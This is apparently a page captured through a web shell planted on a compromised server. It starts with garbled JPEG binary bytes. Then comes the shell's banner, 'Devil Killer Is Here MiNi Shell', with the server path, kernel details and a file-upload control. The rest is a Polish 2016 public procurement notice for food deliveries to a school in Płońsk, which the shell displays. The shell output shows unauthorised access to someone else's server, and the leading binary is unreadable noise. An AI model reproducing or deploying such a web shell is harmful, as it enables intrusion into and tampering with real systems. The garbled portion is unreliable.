JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161209/362852-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.zs1plonsk.pl' target='_blank'>http://www.zs1plonsk.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 362852 - 2016
              z dnia 2016-12-09 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Płońsk: Dostawa artykułów żywnościowych w 2017r. dla Zespołu Szkół Nr 1 im. Stanisława Staszica w Płońsku<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zespół Szkół Nr 1 im. St. Staszica w Płońsku, krajowy numer identyfikacyjny
              19882900000, ul.
              ul. Sienkiewicza 
              8,
              09100  
              Płońsk, woj.
              mazowieckie, państwo
              Polska, tel.
              236 622 987, e-mail
              zsz1plonsk@enter.net.pl, faks
              236 622 987.
              <br />
              Adres strony internetowej (URL): www.zs1plonsk.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Jednostki organizacyjne administracji samorządowej
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.zs1plonsk.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Zespół Szkół Nr 1 im. Stanisława Staszica w Płońsku, 09-100 Płońsk, ul. H. Sienkiewicza 8</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa artykułów żywnościowych w 2017r. dla Zespołu Szkół Nr 1 im. Stanisława Staszica w Płońsku<br /><b>Numer referencyjny: </b>ZS1.26.1.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />8<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>
1.	Przedmiotem zamówienia są sukcesywne dostawy artykułów żywnościowych w 2017r. dla potrzeb Internatu Zespołu Szkół Nr 1 im. Stanisława Staszica w Płońsku. Przedmiot zamówienia został podzielony na części  I - VIII, w tym:

CZĘŚĆ  I  MIĘSO I PRZETWORY 
CZĘŚĆ   II    JAJA 
CZĘŚĆ III  PIECZYWO 
CZĘŚĆ IV  CIASTA 
CZĘŚĆ V   OWOCE I WARZYWA 
CZĘŚĆ VI  PRODUKTY MLECZARSKIE 
CZĘŚĆ VII  MROŻONE WARZYWA, OWOCE, POTRAWY 
CZĘŚĆ VIII   RÓŻNE  ARTYKUŁY  ŻYWNOŚCIOWE 

2.	Szczegółowy wykaz, zakres i wielkość  poszczególnych części zamówienia, oraz wymagania dotyczące realizacji dostaw zostały określone w Szczegółowym opisie przedmiotu zamówienia części I - VIII  stanowiącym Załącznik nr 1 do SIWZ.
3.	Zamawiający zastrzega sobie prawo do zakupu innych artykułów spożywczych nie wymienionych w Opisie przedmiotu zamówienia (np. dla osób chorych lub z różnymi dietami) po cenach wynikających z ogólnie dostępnego cennika Wykonawcy na dzień złożenia zamówienia przez Zamawiającego do limitu posiadanych środków finansowych.
4.	Podane ilości towaru są wielkościami szacunkowymi, służą wyłącznie do obliczenia ceny oferty. Zamawiający nie będzie zobowiązany do zakupu pełnego asortymentu w podanych ilościach.
5.	Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia ilości dostaw wg asortymentu podanego w ofercie w trakcie realizacji umowy - według własnych potrzeb do limitu posiadanych środków finansowych.
6.	Wykonawca będzie zobowiązany do dostarczania zamawianych artykułów do siedziby zamawiającego na własny koszt i ryzyko, transportem przystosowanym do przewozu żywności oraz rozładunku towaru i złożenia go w miejscu wskazanym przez Zamawiającego w jego magazynach.
7.	Zamówienia na dostawy bieżące, zgodne z potrzebami Zamawiającego będą składane z min. jednodniowym wyprzedzeniem, telefonicznie, faksem lub w czasie dostawy na dostawę następną. Wykonawca musi wykazywać dyspozycyjność we wszystkie dni robocze od poniedziałku do piątku, a w uzasadnionych przypadkach na żądanie zamawiającego również w soboty. 
8.	Wskazanie  w opisie przedmiotu zamówienia znaków towarowych, patentów lub pochodzenia uzasadnione jest specyfiką  przedmiotu zamówienia a wskazaniu takiemu towarzyszą wyrazy  lub równoważny. Wykonawca, który powoła się na rozwiązania równoważne opisanym przez Zamawiającego jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez zamawiającego.
9.	Przedmiotem zamówienia w niniejszym postępowaniu są różne artykuły żywnościowe. Dla dostaw opisanych przez Zamawiającego standardy jakościowe nie są ustalane indywidualnie przez Zamawiającego na jego konkretne potrzeby, ale Zamawiający zaspokaja swoje potrzeby poprzez nabywanie towarów ogólnie dostępnych na rynku, powszechnie oferowanych, takich jakie są oferowane wszystkim, ewentualnie zainteresowanym ich zakupem. Różnią się tylko ceną nabycia. Standardy jakości określają dostawy jako dobra popularne, wszędzie na rynku oferowane i wykonywane przez wszystkich wykonawców działających w określonej branży. Można je nabywać bez względu na miejscowość i czas.    Zamawiający uwzględnił koszt cyklu życia zamawianych dostaw  ponoszone w całym okresie korzystania z przedmiotu zamówienia poprzez opisany sposób dostawy na koszt Wykonawcy,  wymagania dotyczące okresu przydatności do spożycia oferowanych produktów, gramaturę produktów, sposób pakowania, zastrzeżenie zmienności ilości zamawianych produktów a przede wszystkim niezmienność oferowanej  ceny w okresie realizacji umowy z zastrzeżeniem zmian ustawowych,  wysokości obowiązującej stawki VAT oraz waloryzacji cen jednostkowych na podstawie wskaźnika ogłoszonego przez GUS. 
10.	Zamawiający nie przewiduje udzielenia zaliczki na poczet wykonania zamówienia. 
<br /><br /><b>II.5) Główny kod CPV: </b>15000000-8<br /><b> Dodatkowe kody CPV:</b>15100000-9,
                03142500-3,
                15810000-9,
                15812000-3,
                03222000-3,
                15500000-3,
                15300000-1,
                15200000-0,
                15400000-2,
                15600000-4,
                15800000-6,
                15896000-5,
                15221000-3,
                15234000-7<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                 Zamawiający nie określa warunków szczegółowych udziału w postępowaniu w powyższym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                 Zamawiający nie określa warunków szczegółowych udziału w postępowaniu w powyższym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                 Zamawiający nie określa warunków szczegółowych udziału w postępowaniu w powyższym zakresie.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawca składa wraz z ofertą dokumenty i oświadczenia: 1. Informacja o podwykonawcach wg Załacznika Nr 3 do SIWZ 2.zobowiązanie innego podmiotu do udostępnienia wykonawcy swoich zasobów - jeżeli dotyczy 3. pełnomocnictwo - jeżeli dotyczy 4. wypełniony formularz cenowy potwierdzający spełnienie wymagań zamawiającego co do oferowanego przedmiotu zamówienia 5.Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji o złożonych ofertach, o której mowa w przepisie art. 86 ust. 5 ustawy Pzp, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w przepisie art. 24 ust. 1 pkt 23 ustawy Pzp  Załącznik Nr 4 do SIWZ. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100.00</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
